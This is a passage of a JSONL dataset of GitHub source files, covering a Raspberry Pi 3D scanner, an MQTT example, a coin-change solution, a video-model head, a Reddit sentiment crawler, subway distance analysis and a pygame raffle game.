ROOD.ChangeDutyCycle(roodwaarde)\r\n GROEN.ChangeDutyCycle(groenwaarde)\r\n BLAUW.ChangeDutyCycle(blauwwaarde)\r\n\r\n\r\ndef waitForInput():\r\n changeColor('green')\r\n\r\n #print(\"Waiting on initial input...\")\r\n while True:\r\n if GPIO.input(buttonPin) == GPIO.LOW:\r\n #print(\"Knop is ingedrukt!\")\r\n changeColor('blue')\r\n break # Knop is ingedrukt\r\n\r\n\r\ndef main():\r\n MotorObject = Motor()\r\n CoordinatesObject = Coordinates()\r\n CalculationsObject = Calculations()\r\n SaveToSD_Object = SaveToSD()\r\n forceStopped = False\r\n\r\n waitForInput()\r\n time.sleep(2)\r\n\r\n for i in range(73): # alleen voor debugging\r\n\r\n if GPIO.input(buttonPin) == GPIO.LOW: # Force stop\r\n print(\"Force stopping!\")\r\n forceStopped = True\r\n changeColor('red')\r\n break\r\n\r\n MotorObject.turnMotor(i)\r\n CoordinatesObject.calculate_coordinates(i)\r\n\r\n if not forceStopped:\r\n CalculationsObject.run()\r\n SaveToSD_Object.save()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n GPIO.setwarnings(False)\r\n GPIO.setmode(GPIO.BOARD)\r\n GPIO.setup(buttonPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\r\n\r\n GPIO.setup(pinBlauw, GPIO.OUT)\r\n GPIO.setup(pinGroen, GPIO.OUT)\r\n GPIO.setup(pinRood, GPIO.OUT)\r\n\r\n BLAUW = GPIO.PWM(pinBlauw, 1000)\r\n GROEN = GPIO.PWM(pinGroen, 1000)\r\n ROOD = GPIO.PWM(pinRood, 1000)\r\n ROOD.start(0)\r\n GROEN.start(0)\r\n BLAUW.start(0)\r\n\r\n main()\r\n","repo_name":"mattie078/3d-scanner","sub_path":"src/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"nl","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15622392201","text":"import os\nimport board\nimport busio\nfrom digitalio import DigitalInOut\nfrom adafruit_esp32spi import adafruit_esp32spi\nimport adafruit_esp32spi.adafruit_esp32spi_socket as socket\nimport adafruit_minimqtt.adafruit_minimqtt as MQTT\n\n# Add settings.toml to your filesystem CIRCUITPY_WIFI_SSID and CIRCUITPY_WIFI_PASSWORD keys\n# with your WiFi credentials. Add your Adafruit IO username and key as well.\n# DO NOT share that file or commit it into Git or other source control.\n\naio_username = os.getenv(\"aio_username\")\naio_key = os.getenv(\"aio_key\")\n\n# If you are using a board with pre-defined ESP32 Pins:\nesp32_cs = DigitalInOut(board.ESP_CS)\nesp32_ready = DigitalInOut(board.ESP_BUSY)\nesp32_reset = DigitalInOut(board.ESP_RESET)\n\n# If you have an externally connected ESP32:\n# esp32_cs = DigitalInOut(board.D9)\n# esp32_ready = DigitalInOut(board.D10)\n# esp32_reset = DigitalInOut(board.D5)\n\nspi = busio.SPI(board.SCK, board.MOSI, board.MISO)\nesp = adafruit_esp32spi.ESP_SPIcontrol(spi, esp32_cs, esp32_ready, esp32_reset)\n\nprint(\"Connecting to AP...\")\nwhile not esp.is_connected:\n try:\n esp.connect_AP(\n os.getenv(\"CIRCUITPY_WIFI_SSID\"), os.getenv(\"CIRCUITPY_WIFI_PASSWORD\")\n )\n except RuntimeError as e:\n print(\"could not connect to AP, retrying: \", e)\n continue\nprint(\"Connected to\", str(esp.ssid, \"utf-8\"), \"\\tRSSI:\", esp.rssi)\n\n### Topic Setup ###\n\n# MQTT Topic\n# Use this topic if you'd like to connect to a standard MQTT broker\n# mqtt_topic = \"test/topic\"\n\n# Adafruit IO-style Topic\n# Use this topic if you'd like to connect to io.adafruit.com\nmqtt_topic = aio_username + \"/feeds/temperature\"\n\n\n### Code ###\n\n\n# Define callback methods which are called when events occur\n# pylint: disable=unused-argument, redefined-outer-name\ndef connect(mqtt_client, userdata, flags, rc):\n # This function will be called when the mqtt_client is connected\n # successfully to the broker.\n print(\"Connected to MQTT Broker!\")\n print(\"Flags: {0}\\n RC: {1}\".format(flags, rc))\n\n\ndef disconnect(mqtt_client, userdata, rc):\n # This method is called when the mqtt_client disconnects\n # from the broker.\n print(\"Disconnected from MQTT Broker!\")\n\n\ndef subscribe(mqtt_client, userdata, topic, granted_qos):\n # This method is called when the mqtt_client subscribes to a new feed.\n print(\"Subscribed to {0} with QOS level {1}\".format(topic, granted_qos))\n\n\ndef unsubscribe(mqtt_client, userdata, topic, pid):\n # This method is called when the mqtt_client unsubscribes from a feed.\n print(\"Unsubscribed from {0} with PID {1}\".format(topic, pid))\n\n\ndef publish(mqtt_client, userdata, topic, pid):\n # This method is called when the mqtt_client publishes data to a feed.\n print(\"Published to {0} with PID {1}\".format(topic, pid))\n\n\ndef message(client, topic, message):\n print(\"New message on topic {0}: {1}\".format(topic, message))\n\n\nsocket.set_interface(esp)\nMQTT.set_socket(socket, esp)\n\n# Set up a MiniMQTT Client\nmqtt_client = MQTT.MQTT(\n broker=\"io.adafruit.com\",\n username=aio_username,\n password=aio_key,\n)\n\n# Connect callback handlers to mqtt_client\nmqtt_client.on_connect = connect\nmqtt_client.on_disconnect = disconnect\nmqtt_client.on_subscribe = subscribe\nmqtt_client.on_unsubscribe = unsubscribe\nmqtt_client.on_publish = publish\nmqtt_client.on_message = message\n\nprint(\"Attempting to connect to %s\" % mqtt_client.broker)\nmqtt_client.connect()\n\nprint(\"Subscribing to %s\" % mqtt_topic)\nmqtt_client.subscribe(mqtt_topic)\n\nprint(\"Publishing to %s\" % mqtt_topic)\nmqtt_client.publish(mqtt_topic, \"Hello Broker!\")\n\nprint(\"Unsubscribing from %s\" % mqtt_topic)\nmqtt_client.unsubscribe(mqtt_topic)\n\nprint(\"Disconnecting from %s\" % mqtt_client.broker)\nmqtt_client.disconnect()\n","repo_name":"adafruit/Adafruit_CircuitPython_MiniMQTT","sub_path":"examples/minimqtt_simpletest.py","file_name":"minimqtt_simpletest.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"72"} +{"seq_id":"25243932904","text":"n, k = map(int, input().split())\ncoin = []\nfor i in range(n):\n money = int(input())\n coin.append(money)\ncoin.sort(reverse=True)\n\nresult = 0\nfor a in coin:\n if k//a == 0:\n continue\n else:\n result += k//a\n k = k%a\nprint(result)\n","repo_name":"hahyeyoung/python","sub_path":"Baekjoon/그리디/11047 동전0.py","file_name":"11047 동전0.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11439460847","text":"import torch\nfrom torch import nn\nfrom mmcv.cnn import kaiming_init, normal_init\nimport math\nimport numpy as np\nimport torch.nn.functional as F\n\nfrom ...train_step_mixin import TrainStepMixin\nfrom ....builder import MODELS, build_backbone\n\n\n@MODELS.register_module()\nclass VCOP(nn.Module, TrainStepMixin):\n \"\"\" pretext task: video clip order predction [1].\n\n Official github: https://github.com/xudejing/video-clip-order-prediction\n\n [1] Self-supervised Spatiotemporal Learning via Video Clip Order\n Prediction, CVPR'19\n\n \"\"\"\n def __init__(self,\n backbone,\n vcop_head):\n super(VCOP, self).__init__()\n self.backbone = build_backbone(backbone)\n self.vcop_head = VCOPHead(**vcop_head)\n self.init_weights()\n\n def init_weights(self):\n self.backbone.init_weights()\n self.vcop_head.init_weights()\n\n def forward(self,\n imgs: torch.Tensor,\n gt_labels: torch.Tensor):\n # imgs in shape of [B, N-seg, 3, T, H, W]\n batch_size, tuple_len, channels, clip_len, h, w = imgs.size()\n imgs = imgs.view(-1, channels, clip_len, h, w)\n feats = self.backbone(imgs)\n order_preds = self.vcop_head(feats)\n losses = self.vcop_head.loss(order_preds, gt_labels)\n return losses\n\n\nclass VCOPHead(nn.Module):\n\n def __init__(self,\n in_channels: int,\n tuple_len: int,\n hidden_channels: int = 512,\n dropout_ratio: float = 0.25):\n super(VCOPHead, self).__init__()\n self.tuple_len = tuple_len\n self.in_channels = in_channels\n self.hidden_channels = hidden_channels\n self.class_num = int(math.factorial(tuple_len))\n self.fc1 = nn.Linear(in_channels * 2, hidden_channels)\n self.num_pairs = (tuple_len - 1) * tuple_len // 2\n pair_inds = [(i, j)\n for i in range(tuple_len)\n for j in range(i+1, tuple_len)]\n self.pair_inds = torch.LongTensor(np.array(pair_inds).reshape(-1))\n assert self.pair_inds.size(0) == self.num_pairs * 2\n self.fc2 = nn.Linear(hidden_channels * self.num_pairs, self.class_num)\n self.dropout = nn.Dropout(dropout_ratio)\n self.relu = nn.ReLU(inplace=True)\n\n def init_weights(self):\n kaiming_init(self.fc1)\n normal_init(self.fc2, std=0.001)\n\n def forward(self, feats: torch.Tensor):\n batch_size = feats.size(0) // self.tuple_len\n assert feats.size(1) == self.in_channels\n feats = feats.view((batch_size, self.tuple_len, self.in_channels, -1))\n # apply average pooling\n # [batch_size, tuple_len, channels]\n feats = torch.mean(feats, dim=3, keepdim=False)\n pair_inds = self.pair_inds.to(feats.device)\n feats = torch.index_select(feats, dim=1, index=pair_inds).contiguous()\n feats = feats.view(batch_size * self.num_pairs, self.in_channels * 2)\n feats = self.relu(self.fc1(feats))\n feats = feats.view(batch_size, self.num_pairs * self.hidden_channels)\n feats = self.dropout(feats)\n cls_logits = self.fc2(feats)\n return cls_logits\n\n def loss(self, cls_logits: torch.Tensor, gt_labels: torch.Tensor):\n losses = dict()\n cls_logits = cls_logits.view(-1, self.class_num)\n batch_size = cls_logits.size(0)\n cls_preds = cls_logits.argmax(dim=1)\n losses['loss_cls'] = F.cross_entropy(cls_logits, gt_labels.view(-1))\n losses['accuracy'] = (cls_preds.eq(gt_labels.view(-1))).float().sum()\n losses['accuracy'] = losses['accuracy'] / batch_size\n return losses\n","repo_name":"microsoft/CtP","sub_path":"pyvrl/models/pretraining/vcop/vcop_model.py","file_name":"vcop_model.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"72"} +{"seq_id":"9470429449","text":"import json\r\nimport requests\r\nimport boto3\r\nfrom boto3.dynamodb.conditions import Key, Attr\r\nfrom decimal import Decimal\r\nimport random\r\nimport time\r\n\r\nrequests.adapters.DEFAULT_RETRIES = 5\r\n\r\ndef get_pushshift_comment(data_type, **kwargs):\r\n base_url = f\"https://api.pushshift.io/reddit/search/comment/\"\r\n payload = kwargs\r\n request = requests.get(base_url, params=payload)\r\n return request.json()\r\n\r\ndef get_pushshift_post(data_type, **kwargs):\r\n base_url = f\"https://api.pushshift.io/reddit/search/submission/\"\r\n payload = kwargs\r\n request = requests.get(base_url, params=payload)\r\n return request.json()\r\n \r\nfrom datetime import datetime\r\ndef convert_time(ts):\r\n dt = datetime.fromtimestamp(ts)\r\n return f\"{dt.year}-{dt.month}-{dt.day}\"\r\n \r\ndef get_stats(arr):\r\n arr.sort()\r\n if not arr:\r\n return []\r\n ret = [arr[0], arr[len(arr)//4], arr[len(arr)//2], arr[len(arr)*3//4], arr[-1]]\r\n for i in range(len(ret)):\r\n ret[i] = round(ret[i],2)\r\n return ret\r\n\r\ndef get_senti_score(text):\r\n base_url = f\"http://52.206.155.70:8080/sentiscore\"\r\n payload = {'text': text}\r\n request = requests.get(base_url, json=payload)\r\n # print(text)\r\n # print(request)\r\n return request.json()\r\n\r\ndef crawler(stock):\r\n data_type=\"comment\" # give me comments, use \"submission\" to publish something\r\n query= stock #\"tsla\" # Add your query\r\n duration=\"24h\" # Select the timeframe. Epoch value or Integer + \"s,m,h,d\" (i.e. \"second\", \"minute\", \"hour\", \"day\")\r\n size=10000 # maximum 1000 comments\r\n sort_type=\"score\" # Sort by score (Accepted: \"score\", \"num_comments\", \"created_utc\")\r\n sort=\"desc\" # sort descending\r\n aggs=\"subreddit\" #\"author\", \"link_id\", \"created_utc\", \"subreddit\"\r\n try:\r\n comment = get_pushshift_comment(data_type=data_type, \r\n q=query, \r\n after=duration, \r\n size=size, \r\n sort_type=sort_type,\r\n sort=sort)\r\n except:\r\n comment = {'data':[]}\r\n try:\r\n \r\n post = get_pushshift_post(data_type=data_type, \r\n q=query, \r\n after=duration, \r\n size=size, \r\n sort_type=sort_type,\r\n sort=sort)\r\n except:\r\n post = {'data':[]}\r\n \r\n # print(comment)\r\n c = []\r\n for each in post['data']:\r\n c.append({\r\n 'text': (each['title'] +\" . \"+each['selftext'])[:100],\r\n 'date': convert_time(each['created_utc']) ,\r\n 'id': each['id']\r\n })\r\n # print(post)\r\n p = []\r\n for each in comment['data']:\r\n p.append({\r\n 'text': each['body'][:100],\r\n 'date': convert_time(each['created_utc']),\r\n 'id': each['id']\r\n })\r\n \r\n text = p + c\r\n scores = []\r\n \r\n \r\n for i, each in enumerate(text):\r\n score = get_senti_score(each['text'])# random.randrange(-100,100)*0.01\r\n s = score['body']['scores']\r\n scores.append(s)\r\n text[i]['score'] = s\r\n \r\n from datetime import date\r\n import datetime\r\n today = date.today()\r\n # est = datetime.timedelta(hours=-5)\r\n # today += est\r\n date = str(today)\r\n \r\n print(date)\r\n stock = query\r\n \r\n dynamodb = boto3.resource('dynamodb')\r\n table = dynamodb.Table('meme_stock_history')\r\n response = table.get_item(\r\n Key={\r\n 'rid': f'{stock}_{date}'\r\n }\r\n )\r\n # print(response)\r\n src = 'Reddit'\r\n \r\n \r\n if 'Item' not in response:\r\n \r\n \r\n data = {\r\n 'rid': f\"{stock}_{date}\".lower(),\r\n 'stock': stock,\r\n 'date': date,\r\n 'records': {\r\n 'comment': text\r\n },\r\n 'sentiments': [\r\n {\r\n 'source': src,\r\n 'scores': get_stats(scores)\r\n }\r\n ],\r\n 'v': 0\r\n \r\n }\r\n response = table.put_item (\r\n Item = json.loads(json.dumps(data), parse_float=Decimal)\r\n )\r\n # print (response)\r\n \r\n \r\n else:\r\n \r\n data = response['Item']\r\n data['records']['comment'] += text\r\n added = False\r\n for i, each in enumerate(data['sentiments']):\r\n if each['source'] == src:\r\n added = True\r\n data['sentiments'][i] = {\r\n 'source': src,\r\n 'scores': get_stats(scores)\r\n }\r\n break\r\n if not added:\r\n data['sentiments'].append( {\r\n 'source': src,\r\n 'scores': get_stats(scores)\r\n })\r\n for i in range(len(data['sentiments'])):\r\n for j in range(len(data['sentiments'][i]['scores'])):\r\n data['sentiments'][i]['scores'][j] = float(data['sentiments'][i]['scores'][j])\r\n\r\n for i in range(len(data['records']['comment'])):\r\n data['records']['comment'][i]['score'] = float( data['records']['comment'][i]['score'] )\r\n \r\n if 'price' in data and 'close' in data['price']:\r\n data['price']['close'] = float(data['price']['close'])\r\n \r\n data['v'] += 1\r\n data['v'] = float(data['v'])\r\n \r\n added = set()\r\n comments = []\r\n for comment in data['records']['comment']:\r\n if comment['id'] not in added:\r\n added.add(comment['id'])\r\n comments.append(comment)\r\n data['records']['comment'] = comments\r\n \r\n \r\n response = table.put_item(\r\n Item = json.loads(json.dumps(data), parse_float=Decimal)\r\n )\r\n # print (response)\r\n print(data)\r\n \r\n \r\n\r\ndef lambda_handler(event, context):\r\n dynamodb = boto3.resource('dynamodb')\r\n table = dynamodb.Table('meme_stock_history')\r\n response = table.get_item(\r\n Key={\r\n 'rid': 'stock_tickers'\r\n }\r\n )\r\n print(response)\r\n stocks = []\r\n for each in response['Item']['tickers']:\r\n stocks.append(each)\r\n print(stocks)\r\n \r\n \r\n \r\n res = []\r\n for stock in stocks:\r\n print(\"crawling: \"+stock)\r\n # print( type(stock) )\r\n crawler(str(stock))\r\n time.sleep(2)\r\n # res.append(response)\r\n \r\n \r\n\r\n \r\n \r\n return {\r\n 'statusCode': 200,\r\n 'body': {\r\n 'responses': ''\r\n }\r\n }\r\n","repo_name":"MemestockSentiTracker/memestocks_backend","sub_path":"lf_reddit.py","file_name":"lf_reddit.py","file_ext":"py","file_size_in_byte":6843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23670877400","text":"# Division,Line,Station Name,Station Latitude,Station Longitude,Route1,Route2,Route3,Route4,Route5,Route6,Route7,Route8,Route9,Route10,Route11,Entrance Type,Entry,Exit Only,Vending,Staffing,Staff Hours,ADA,ADA Notes,Free Crossover,North South Street,East West Street,Corner,Entrance Latitude,Entrance Longitude,Station Location,Entrance Location\nimport json\n\n\nimport requests\n\nfrom config import *\n\n\n# Store all the stations into list\ndef openStation(filename='data/subway.csv'):\n file = open(filename)\n file.next()\n stations = [] # Lat, Lng\n for line in file:\n temp = line.split(',')\n stations.append([float(temp[28]), float(temp[29]),temp[2]])\n return stations\n\n\ndef isNearby(Lat, Lng, stations, radius=0.005):\n LatRange = (Lat - radius, Lat + radius)\n LngRange = (Lng - radius, Lng + radius)\n for station in stations:\n if station[0] >= LatRange[0] and station[0] <= LatRange[1] and station[1] >= LngRange[0] and station[1] <= \\\n LngRange[1]:\n return True\n return False\n\n\ndef calDirection(fromLoc, toLoc, mode='walking', units='metric'):\n URL = 'https://maps.googleapis.com/maps/api/directions/json?units=' + units + '&mode=' + mode + '&origin=' + str(\n fromLoc[0]) + ',' + str(fromLoc[1]) + '&destination=' + str(toLoc[0]) + ',' + str(\n toLoc[1]) + '&key=' + API_Direction\n response = requests.get(URL)\n if response.status_code == 200:\n jsonfile = json.loads(response.content)\n if jsonfile['rows'][0]['elements'][0]['status'] == 'OK':\n estDis = jsonfile['rows'][0]['elements'][0]['distance']['value'] # in meter\n # estTime = jsonfile['rows'][0]['elements'][0]['duration']['value'] # in seconds\n return estDis\n\n\ndef calDis(fromLoc, toLoc, mode='walking', units='metric'):\n URL = 'https://maps.googleapis.com/maps/api/distancematrix/json?units=' + units + '&mode=' + mode + '&origins=' + str(\n fromLoc[0]) + ',' + str(fromLoc[1]) + '&destinations=' + str(toLoc[0]) + ',' + str(\n toLoc[1]) + '&key=' + API_Distance\n response = requests.get(URL)\n if response.status_code == 200:\n jsonfile = json.loads(response.content)\n if jsonfile['rows'][0]['elements'][0]['status'] == 'OK':\n estDis = jsonfile['rows'][0]['elements'][0]['distance']['value'] # in meter\n # estTime = jsonfile['rows'][0]['elements'][0]['duration']['value'] # in seconds\n return estDis\n\n\ndef stationFrequency(distanceData, radius = 0.005):\n from collections import Counter\n valid = []\n for trip in distanceData:\n if trip[7] <= radius and trip[8] <= radius:\n valid.append(trip[12] + ' to ' + trip[13])\n return Counter(valid).most_common(10)\n\ndef laziness(distanceData):\n import numpy as np\n import matplotlib.pyplot as plt\n hours = []\n for i in range(24):\n time = str(i).zfill(2) + ':00 - ' + str(i + 1).zfill(2) + ':00'\n hours.append(time)\n totalPUDistance = [0. for i in range(24)]\n countPUDistance = [0 for i in range(24)]\n for trip in distanceData:\n PUHour = trip[0].hour\n # DOHour = trip[1].hour\n if trip[7] < 0.1 and trip[8] < 0.1:\n totalPUDistance[PUHour] = totalPUDistance[PUHour] + trip[7] + trip[8]\n countPUDistance[PUHour] += 1\n res = []\n for i in range(24):\n res.append(totalPUDistance[i]/float(countPUDistance[i]))\n objects = tuple(hours) # x axis value\n y_pos = np.arange(len(objects)) # x axis names\n plt.bar(y_pos, res, align='center', alpha=0.5)\n plt.xticks(y_pos, objects, rotation=90)\n plt.ylabel('Avg Distance to Station')\n plt.title('Distance to Stations of all Taxi Trips')\n plt.show()","repo_name":"LamsokLee/UberAnalysis","sub_path":"subway.py","file_name":"subway.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71892994152","text":"from django.http import JsonResponse\n\n\nclass ResultMaker:\n\n @staticmethod\n def success(data):\n # if isinstance(data, object):\n # data = JsonUtil.object_to_dict(data)\n\n result = {\n \"code\": 0,\n \"data\": data\n }\n return JsonResponse(result, json_dumps_params={'ensure_ascii': False})\n\n @staticmethod\n def fail(code=1, msg=None, data=None):\n result = {\n \"code\": code,\n \"data\": {\n \"message\": msg,\n \"data\": data\n }\n }\n return JsonResponse(result, json_dumps_params={'ensure_ascii': False})\n","repo_name":"DataCanvasIO/LMPM","sub_path":"backend/promptmanager/app_common/result_maker.py","file_name":"result_maker.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"72"} +{"seq_id":"32804586784","text":"import logging\nfrom summary.summaryitem import SummaryItem\nfrom database.database import Database as Db\nfrom database.tables.tsentry import TsEntryTable\nfrom summary.matrix.matrixdata import MatrixData\n\n#----------------------------------------------------------------------\nclass AmRkaData(MatrixData):\n#----------------------------------------------------------------------\n def __init__(self,item):\n\n super().__init__(item)\n\n raise\n\n codes = ['ERC','NOK','ALU','SPR','ATT','TMO','QUA','INT','QOR','TER','SKY','OTHERS','COB','TTT','OTH']\n\n weekList = Db.WeeksTbl.GetWeeks(Db.db,period)\n data = Db.TsEntryTbl.GetAmRkaSum(Db.db,region,codes,weekList)\n\n colSumList = super().calcColSum(data)\n rowSumList = super().calcRowSum(data)\n weeks = super().calcCols(colSumList)\n if (weeks != len(weekList)):\n weeks = len(weekList)\n rowAvgList = super().calcRowAvg(rowSumList,weeks)\n\n self.compData = [rowAvgList]\n self.data = super().calcData(data,len(codes),weeks)\n\n self.dataCols = len(self.data)\n self.dataRows = len(self.data[0])\n\n\n self.title = 'AM Regional Key Customers'\n self.colDesc = []\n for i in range(self.dataCols):\n self.colDesc.append('Week ' + str(i+1))\n\n self.colCompDesc = ['Avg']\n\n self.rowDesc = ['Ericsson','Nokia','Alcatel-Lucent','Sprint','AT&T','T-Mobile',\n 'Qualcomm','Intel','Qorvo','Teradyne','Skyworks',\n 'Sum of all other customers', \\\n 'Cobham', 'Technical Training - All Types','Customer \\'Other\\'']\n\n self.rowCompDesc = []\n\n super().calcSize()\n\n self.rangeList = []\n\n","repo_name":"lhoag64/Queries","sub_path":"Queries/Queries/summary/matrix/Archive/amrkadata.py","file_name":"amrkadata.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2279809188","text":"# input = ABACADABRAC pattern = ABRA\n# output= Substring is present \n\n\ndef substring(givenstring , pattern):\n length1 = len(givenstring)\n length2 = len(pattern)\n\n for index in range(0,length1-length2):\n for i in range(0,length2):\n if pattern[i] != givenstring[index + i]:\n break\n \n if length2-1 == i:\n return \"Bro substring is present\"\n\n return \"Substring not present\"\n\nresult = substring(\"ABACADABRAC\", \"ABRAa\")\nprint(result)","repo_name":"karthiikselvam/payirchi","sub_path":"Strings/substringsearch.py","file_name":"substringsearch.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31820329237","text":"\"\"\"\r\nFiverr Project for ryancox642\r\nRaffle Game\r\n\"\"\"\r\n\r\nimport pygame, sys, random\r\nfrom tkinter import messagebox, Tk\r\nimport tkinter as tk \r\nfrom PIL import ImageTk, Image\r\nfrom copy import deepcopy\r\n\r\ndef show_text(Text,X,Y,Spacing,WidthLimit,Font,surface,double=1,overflow='normal'):\r\n Text += ' '\r\n if double == 2:\r\n X = int(X/2)\r\n Y = int(Y/2)\r\n OriginalX = X\r\n OriginalY = Y\r\n CurrentWord = ''\r\n if overflow == 'normal':\r\n for char in Text:\r\n if char not in [' ','\\n']:\r\n try:\r\n Image = Font[str(char)][1]\r\n CurrentWord += str(char)\r\n except KeyError:\r\n pass\r\n else:\r\n WordTotal = 0\r\n for char2 in CurrentWord:\r\n WordTotal += Font[char2][0]\r\n WordTotal += Spacing\r\n if WordTotal+X-OriginalX > WidthLimit:\r\n X = OriginalX\r\n Y += Font['Height']\r\n for char2 in CurrentWord:\r\n Image = Font[str(char2)][1]\r\n surface.blit(pygame.transform.scale(Image,(Image.get_width()*double,Image.get_height()*double)),(X*double,Y*double))\r\n X += Font[char2][0]\r\n X += Spacing\r\n if char == ' ':\r\n X += Font['A'][0]\r\n X += Spacing\r\n else:\r\n X = OriginalX\r\n Y += Font['Height']\r\n CurrentWord = ''\r\n if X-OriginalX > WidthLimit:\r\n X = OriginalX\r\n Y += Font['Height']\r\n return X,Y\r\n if overflow == 'cut all':\r\n for char in Text:\r\n if char not in [' ','\\n']:\r\n try:\r\n Image = Font[str(char)][1]\r\n surface.blit(pygame.transform.scale(Image,(Image.get_width()*double,Image.get_height()*double)),(X*double,Y*double))\r\n X += Font[str(char)][0]\r\n X += Spacing\r\n except KeyError:\r\n pass\r\n else:\r\n if char == ' ':\r\n X += Font['A'][0]\r\n X += Spacing\r\n if char == '\\n':\r\n X = OriginalX\r\n Y += Font['Height']\r\n CurrentWord = ''\r\n if X-OriginalX > WidthLimit:\r\n X = OriginalX\r\n Y += Font['Height']\r\n return X,Y\r\n\r\ndef generate_font(FontImage,FontSpacingMain,TileSize,TileSizeY,color):\r\n FontSpacing = deepcopy(FontSpacingMain)\r\n FontOrder = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','.','-',',',':','+','\\'','!','?','0','1','2','3','4','5','6','7','8','9','(',')','/','_','=','\\\\','[',']','*','\"','<','>',';']\r\n FontImage = pygame.image.load(FontImage).convert()\r\n NewSurf = pygame.Surface((FontImage.get_width(),FontImage.get_height())).convert()\r\n NewSurf.fill(color)\r\n FontImage.set_colorkey((255,0,0))\r\n NewSurf.blit(FontImage,(0,0))\r\n FontImage = NewSurf.copy()\r\n FontImage.set_colorkey((0,0,0))\r\n num = 0\r\n for char in FontOrder:\r\n FontImage.set_clip(pygame.Rect(((TileSize+1)*num),0,TileSize,TileSizeY))\r\n CharacterImage = FontImage.subsurface(FontImage.get_clip())\r\n CharacterImage = CharacterImage.convert()\r\n CharacterImage.set_colorkey((0,0,0))\r\n try:\r\n FontSpacing[char].append(CharacterImage)\r\n except KeyError:\r\n break\r\n num += 1\r\n FontSpacing['Height'] = TileSizeY\r\n return FontSpacing\r\n\r\n\r\nclass Data(object):\r\n def __init__(self):\r\n self.root=tk.Tk()\r\n self.root.geometry(\"300x100+500+200\") \r\n self.root.title(\"Raffle Game\")\r\n\r\n self.x_var = tk.StringVar() \r\n self.y_var = tk.StringVar()\r\n self.bombs = tk.StringVar() \r\n\r\n self.x_label = tk.Label(self.root, text = 'No of Columns: ', \r\n font=('courier', \r\n 10, ))\r\n\r\n self.y_label = tk.Label(self.root, text = 'No of Rows: ', \r\n font=('courier', \r\n 10, )) \r\n \r\n self.bomb_label = tk.Label(self.root, text = 'No of Bomb: ', \r\n font=('courier', \r\n 10, )) \r\n \r\n self.x_entry = tk.Entry(self.root, textvariable = self.x_var, font=('courier',10,'normal')) \r\n \r\n self.y_entry = tk.Entry(self.root, textvariable = self.y_var, font=('courier',10,'normal')) \r\n\r\n self.bomb_entry = tk.Entry(self.root, textvariable = self.bombs, font=('courier',10,'normal')) \r\n\r\n self.sub_btn=tk.Button(self.root,text = 'Submit', command = self.submit) \r\n \r\n self.x_label.grid(row=0,column=0) \r\n self.x_entry.grid(row=0,column=1) \r\n self.y_label.grid(row=1,column=0) \r\n self.y_entry.grid(row=1,column=1) \r\n self.bomb_label.grid(row=2,column=0) \r\n self.bomb_entry.grid(row=2,column=1) \r\n self.sub_btn.grid(row=3,column=1) \r\n \r\n self.root.mainloop() \r\n \r\n \r\n def submit(self): \r\n x = self.x_var.get() \r\n y = self.y_var.get() \r\n bomb = self.bombs.get() \r\n self.x_var.set(\"\") \r\n self.y_var.set(\"\") \r\n self.root.destroy()\r\n self.start = Raffle(int(x), int(y), int(bomb))\r\n \r\n\r\n\r\n\r\n\r\nclass Grid(object):\r\n def __init__(self, x, y, w, h):\r\n self.x, self.y = x, y\r\n self.w, self.h = w, h\r\n self.bomb = False\r\n self.notbomb = False\r\n self.col = (0, 0, 0)\r\n self.image = pygame.image.load(\"images/bomb.png\")\r\n self.clicked = False\r\n \r\n def _id(self):\r\n self.clicked = True\r\n if self.bomb:\r\n self.notbomb = True\r\n self.bomb = False\r\n self.clicked = False\r\n\r\n\r\n def show(self, win):\r\n if self.clicked and not self.notbomb:\r\n self.col = (231, 0, 150)\r\n pygame.draw.rect(win, self.col, (self.x*self.w, self.y*self.h, self.w-1, self.h-1))\r\n if self.notbomb:\r\n win.blit(pygame.transform.scale(self.image, (self.w-1, self.h-1)), (self.x*self.w, self.y*self.h))\r\n \r\n\r\n\r\nclass Raffle(object):\r\n def __init__(self, cols, rows, bombs):\r\n self.cols = cols\r\n self.rows = rows\r\n \r\n self.size = (width, height) = cols*30, rows*30\r\n pygame.init()\r\n\r\n self.win = pygame.display.set_mode(self.size)\r\n self.icon = pygame.image.load(\"images/2.png\")\r\n pygame.display.set_caption(\"Raffle Game\")\r\n pygame.display.set_icon(self.icon)\r\n self.clock = pygame.time.Clock()\r\n\r\n\r\n self.w = width//cols\r\n self.h = height//rows\r\n\r\n self.grid = []\r\n\r\n\r\n # Font ------------------------------------------------------- #\r\n self.font_dat = {'A':[3],'B':[3],'C':[3],'D':[3],'E':[3],'F':[3],'G':[3],'H':[3],'I':[3],'J':[3],'K':[3],'L':[3],'M':[5],'N':[3],'O':[3],'P':[3],'Q':[3],'R':[3],'S':[3],'T':[3],'U':[3],'V':[3],'W':[5],'X':[3],'Y':[3],'Z':[3],\r\n 'a':[3],'b':[3],'c':[3],'d':[3],'e':[3],'f':[3],'g':[3],'h':[3],'i':[1],'j':[2],'k':[3],'l':[3],'m':[5],'n':[3],'o':[3],'p':[3],'q':[3],'r':[2],'s':[3],'t':[3],'u':[3],'v':[3],'w':[5],'x':[3],'y':[3],'z':[3],\r\n 